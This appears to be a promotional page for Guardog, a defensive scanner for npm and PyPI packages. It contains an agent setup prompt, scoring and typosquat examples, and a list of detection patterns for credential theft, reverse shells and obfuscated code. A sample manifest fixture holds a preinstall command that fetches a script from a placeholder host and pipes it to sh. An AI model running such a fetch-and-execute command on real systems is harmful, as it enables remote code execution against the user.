Scan before you install. Know before it's too late.
Think of it as free antivirus for your code dependencies. It scans every package for hidden malware and checks live vulnerability databases for newly discovered threats. Install once, run it before you install anything.
One prompt handles everything. Copy it from the box below.
It installs GuardDog, walks you through getting a free VirusTotal key (500 scans per day, no credit card), and confirms everything is working.
In Claude Code: /guardog express npm. In terminal: guardog analyze express npm. You get SILENT, WHINE, or BARK.
When you run Guardog, it reads the actual package code sitting on your disk. It checks for credential harvesters, obfuscated scripts, crypto miners, reverse shells, and 25+ other malicious patterns. No sample or summary. The real files.
A package that was clean last month may have a critical CVE discovered today. Guardog queries live vulnerability databases every time you run it, so you are always checking against the latest known threats. Not a snapshot. Live data.
SILENT: Package passed all checks. Safe to install.
WHINE: Suspicious signals found. Review before installing.
BARK: Dangerous. Do not install.
One prompt installs GuardDog, gets your free VirusTotal API key, and confirms everything is working. Paste it into Claude Code or Codex.
Set up GuardDog on this computer and get a free VirusTotal API key.
--- STEP 1: Install GuardDog ---
Run these commands in the terminal:
npm install -g github:josephtandle/guardog
guardog setup
After setup:
1. Confirm the guardog command is available globally.
2. Tell me where npm installed the global command.
3. Explain how I use GuardDog before installing unfamiliar packages.
--- STEP 2: Get a free VirusTotal API key ---
VirusTotal scans packages against 70+ antivirus engines. The free tier gives 500 requests per day at 4 requests per minute. No credit card required.
1. Open https://www.virustotal.com in my browser.
2. Create a free account if I do not already have one (click Sign In).
3. Once I confirm I am logged in, go to my profile icon (top-right) and click API Key.
4. Tell me to copy the key shown there.
5. Add the key to my shell profile. On macOS add to ~/.zshrc, on Linux add to ~/.bashrc:
export VIRUSTOTAL_API_KEY="<paste my key here>"
Resolve the home directory dynamically. Do not hard-code any paths.
6. Reload the shell profile so the key is active immediately.
7. Confirm the key loaded: echo $VIRUSTOTAL_API_KEY
--- STEP 3: Confirm everything works ---
Run: guardog analyze lodash npm
Show me the result and explain the verdict (SILENT, WHINE, or BARK).
Remind me to run guardog analyze <package-name> <npm or pypi> before installing any unfamiliar package.
Requires Node.js and npm. View on GitHub for the manual install path.
GuardDog already scans package code, checks live vulnerability databases, and runs 30+ malicious pattern checks on its own. VirusTotal adds a second layer: it submits the package to 70+ antivirus engines simultaneously and checks the result against the world's largest collective threat database. Think of it as GuardDog asking 70 security firms at once.
The prompt handles the full setup: it opens virustotal.com, walks you through creating a free account, copies your API key into your shell profile, and confirms it is working. You can skip this step — GuardDog works without it — but 500 free scans per day is more than most people will ever use.
Four scanning layers run on every package. VirusTotal is optional but recommended. Everything else works without any setup.
Queries the Open Source Vulnerabilities database maintained by Google. Covers npm, PyPI, and hundreds of other ecosystems. Returns known CVEs with severity ratings.
Each CVE is scored: critical (+25), high (+15), medium (+5), low (+2). The scores stack into a total threat score that drives the final verdict.
OSV is a free, open API. CVE lookups work out of the box on every scan, no account needed.
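The stacking described above, applied to an OSV-style query response. This is an added example, not the tool's own code: the weights are the ones stated on this page, while the sample response, the function names, the use of the `database_specific.severity` label, and the choice to skip withdrawn advisories are assumptions.

```javascript
// Weights as stated on this page.
const WEIGHTS = { critical: 25, high: 15, medium: 5, low: 2 };

// Constructed OSV-style response; the ids are placeholders, not real advisories.
const sampleResponse = {
  vulns: [
    { id: "EXAMPLE-0001", database_specific: { severity: "CRITICAL" } },
    { id: "EXAMPLE-0002", database_specific: { severity: "MODERATE" } },
    { id: "EXAMPLE-0003", database_specific: { severity: "HIGH" } },
    { id: "EXAMPLE-0004", database_specific: {} }, // no severity label at all
    { id: "EXAMPLE-0005", withdrawn: "2024-01-01T00:00:00Z",
      database_specific: { severity: "CRITICAL" } },
  ],
};

// Map an advisory's severity label onto one of the four scored levels.
// Assumption: the label lives in database_specific.severity; "MODERATE"
// is treated as this page's "medium".
function normalizeSeverity(vuln) {
  const raw = String(vuln?.database_specific?.severity ?? "").toLowerCase();
  const level = raw === "moderate" ? "medium" : raw;
  return Object.hasOwn(WEIGHTS, level) ? level : null;
}

// Sum the weights. Unrated advisories are reported separately instead of
// silently counting as zero, so a reviewer still sees them.
function scoreVulns(response) {
  const result = { score: 0, counted: [], unrated: [] };
  for (const vuln of response.vulns ?? []) {
    if (vuln.withdrawn) continue; // assumption: withdrawn advisories are ignored
    const level = normalizeSeverity(vuln);
    if (level === null) {
      result.unrated.push(vuln.id);
      continue;
    }
    result.score += WEIGHTS[level];
    result.counted.push({ id: vuln.id, level, points: WEIGHTS[level] });
  }
  return result;
}

console.log(scoreVulns(sampleResponse));
```

The page does not state the score thresholds that separate SILENT, WHINE and BARK, so the example stops at the total.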
Checks download counts, package age, maintainer count, and metadata signals. A package with 12 downloads published 3 days ago scores very differently than lodash.
Same reputation signals for Python packages. Age, downloads, maintainer history, and whether the project links to a real repository.
Checks whether the package links to a real GitHub repo. Missing repo, zero stars, and brand-new accounts all add to the threat score.
Detects patterns that read environment variables, AWS keys, SSH files, or browser credential stores and send them out over the network.
Flags eval(), Function(), fromCharCode(), and base64-encoded execution chains. Legitimate packages have no reason to hide what they do.
Detects mining library imports, CPU-pegging loops, and wallet address patterns embedded in install scripts.
Matches patterns that open outbound sockets, spawn shell processes, and establish persistence on the host system.
Scans postinstall, preinstall, and prepare scripts for suspicious network calls and file system writes outside the package directory.
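A minimal version of the lifecycle-script check described above, run over a constructed package.json. This is an added example, not the tool's own code: the signal names and regular expressions are assumed heuristics, and the manifest describes a made-up package.

```javascript
// The three hooks named on this page; npm runs them without being asked.
const HOOKS = ["preinstall", "postinstall", "prepare"];

// Assumed heuristics for this example, not the tool's actual rule set.
const SIGNALS = [
  { id: "network-call", re: /\b(?:curl|wget)\b|https?:\/\//i },
  { id: "pipe-to-shell", re: /\|\s*(?:sh|bash)\b/ },
  { id: "inline-node-eval", re: /\bnode\s+(?:-e|--eval)(?=\s|$)/ },
  { id: "write-outside-package",
    re: /(?:^|[\s"'=>])(?:~\/|\$HOME\b|\.\.\/|\/etc\/|\/tmp\/)/ },
];

// Constructed manifest for a made-up package.
const sampleManifest = JSON.stringify({
  name: "example-pkg",
  version: "1.0.0",
  scripts: {
    test: "curl https://example.invalid/ci-status", // not run on install
    prepare: "tsc -p .",
    postinstall: "node setup.js && cp config.json ~/.example-pkg/config.json",
    preinstall: "curl -s https://example.invalid/bootstrap.sh | sh",
  },
});

// Return one finding per install-time hook that trips at least one signal.
function scanInstallScripts(manifestText) {
  const scripts = JSON.parse(manifestText).scripts ?? {};
  const findings = [];
  for (const hook of HOOKS) {
    const command = scripts[hook];
    if (typeof command !== "string") continue;
    const signals = SIGNALS.filter((s) => s.re.test(command)).map((s) => s.id);
    if (signals.length > 0) findings.push({ hook, command, signals });
  }
  return findings;
}

for (const f of scanInstallScripts(sampleManifest)) {
  console.log(`${f.hook}: ${f.signals.join(", ")}`);
}
```

Only the hooks that run automatically are inspected, which is why the `test` script's network call is not reported.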
Cross-references the package name against a list of popular packages. A name one character away from "express" or "react" is an immediate flag.
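One way to implement the "one character away" test, added here as an example rather than taken from the tool. It goes slightly beyond the sentence above by also counting a swap of two adjacent letters as a single edit (optimal string alignment distance); the popular-package list and the function names are assumptions.

```javascript
// Assumed reference list; a real check would load a much longer one.
const POPULAR = ["express", "react", "lodash", "axios", "requests"];

// Optimal string alignment distance: insertions, deletions, substitutions
// and adjacent transpositions each cost 1.
function osaDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [
    i,
    ...Array(b.length).fill(0),
  ]);
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(
        d[i - 1][j] + 1, // deletion
        d[i][j - 1] + 1, // insertion
        d[i - 1][j - 1] + cost // substitution or match
      );
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1); // transposition
      }
    }
  }
  return d[a.length][b.length];
}

// Flag a name that is exactly one edit from a popular package.
// An exact match is the popular package itself and is never flagged.
function checkTyposquat(name, popular = POPULAR) {
  const candidate = name.toLowerCase();
  if (popular.includes(candidate)) {
    return { flagged: false, nearest: candidate, distance: 0 };
  }
  let best = { flagged: false, nearest: null, distance: Infinity };
  for (const target of popular) {
    const distance = osaDistance(candidate, target);
    if (distance < best.distance) {
      best = { flagged: distance === 1, nearest: target, distance };
    }
  }
  return best;
}

console.log(checkTyposquat("expres"), checkTyposquat("left-pad"));
```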
With a free VirusTotal API key, Guardog submits the package URL or file hash for scanning across 70+ AV engines simultaneously. Takes about 5 seconds.
4 requests per minute, 500 per day. More than sufficient for scanning packages before you install them. Signing up takes 2 minutes.
CVE lookups, reputation checks, and pattern analysis all run without a key. VirusTotal adds a deeper malware layer on top. Recommended but not required.
After install, type /guardog followed by any package name in Claude Code. Guardog runs the scan and Claude interprets the results in plain English.
SILENT means safe to install. WHINE means suspicious, review before installing. BARK means dangerous, do not install. No ambiguity.
node ~/guardog/src/index.js analyze lodash npm -- run it directly without Claude Code if you prefer.
P.S. Supply chain attacks through npm and PyPI have hit companies you have heard of. The packages look real. The names are close. The installs are silent. Guardog takes 3 seconds to run and costs nothing.